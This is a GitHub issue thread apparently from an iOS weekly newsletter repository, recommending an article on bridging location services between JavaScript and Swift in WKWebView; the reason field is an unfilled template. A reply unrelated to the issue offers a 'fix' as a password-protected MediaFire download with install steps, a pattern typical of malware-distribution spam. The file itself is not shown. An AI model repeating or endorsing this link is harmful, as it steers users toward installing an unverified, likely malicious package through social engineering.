### ISSUE TITLE
JavaScript to Swift and back: Bridging location services in WKWebView

### ISSUE THREAD

**Issue by ChengzhiHuang** [SwiftOldDriver/iOS-Weekly#4701]
# 推荐收录

## 链接

https://swiftlybald.com/javascript-to-swift-and-back-bridging-location-services-in-wkwebview

## 理由

[此处填写您的推荐理由]

## 推荐人信息

如果收录这个资源，我们会在点评后面说明推荐信息人。

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
